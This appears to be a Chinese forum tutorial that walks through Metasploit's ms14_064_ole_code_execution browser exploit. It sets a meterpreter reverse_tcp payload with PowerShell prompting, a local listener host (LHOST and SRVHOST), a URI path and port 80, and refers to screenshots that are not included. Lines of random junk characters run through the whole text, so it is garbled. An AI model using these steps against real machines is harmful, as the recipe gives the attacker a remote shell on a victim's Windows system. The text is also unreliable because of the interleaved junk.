c" ?) |% N# a+ q7 [
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
7 V) N0 e7 {5 ?$ s! ^
" E- B& A6 D" _: q% R9 \3 a- ^2 q; t9 I2 g& N
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ! W$ x5 w8 F$ t6 o8 F
; `8 z( O/ ?, v# O8 k0 s
* R! Q$ c( g1 l+ S 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
' b, R# p9 Z6 n2 k
1 _. N1 K$ f3 [3 e# J
% k8 P+ I- d6 Y, K+ D! V set AllowPowershellPrompt true
: _6 c I: c* N
7 x* p7 h6 c, {$ Z
: e& ]. o- t- O" N# x
Set LHOST 192.168.0.109+ y, D) `3 p- N
4 O. X# k1 L; v% g" x4 @
k1 K+ `0 Y ^3 J set SRVHOST 192.168.0.109
9 ~/ i1 O4 O; [3 R c3 O2 J* J) b
; N/ H) A/ S- a2 A% [# M
1 c4 W L/ O8 o2 p$ P9 F$ g1 x
Set uripath share' H& U3 V5 G7 y% J
* i- y* |, F1 K
& k6 U1 N. F/ V, L5 t+ {2 g2 R/ m Set srvport 80
6 U$ E6 v. K- o5 D
; b' J9 K9 O0 n5 j
* d; n8 y, _' K$ L" M
, L& a/ _: ?) G- }
) u% s8 H, H/ ] \1 A' ]3 [ G% \% Y5 C
$ }0 A% C* O3 C* g& i( f
- o+ G* D0 u+ c( ^ ^$ }
/ C* [8 k4 Y& e( n5 h6 ~) ^
" E) M. r2 ~: J! p9 h
3 c3 u3 M2 O/ m# k2 B, e
; ?5 q* \$ m2 W$ a6 R; ?( g3 h. a
) A5 m3 Z& q$ \/ A& R) _# @$ t
$ q+ B8 w! [4 ?; ?5 Y8 T7 H3 k. k" h; c! F& q7 h6 f7 ~8 k4 N: N2 v& q
4 p/ ]2 ?# f( m' X; ~
8 k, O, F1 k: D j
6 k8 G' h" x. e2 K 下面我们来访问本地地址如图:
0 l' p6 _; u1 B! G1 R. T
6 ^. {4 \5 z; N8 U/ ~* h; C
- L- n# j2 s; w/ f" n1 R \5 }# } : K y1 i# z$ v% [
7 o( \6 e9 v5 ~ }6 U/ [7 N" Q4 M
) [. j5 d2 g7 v' b4 v% z
2 u- i! z- u" B
; X: Z6 \$ d( b, h& r" K
7 i/ [) B/ t1 l7 J: K. T
: w3 U0 Q# y# c: `& x: T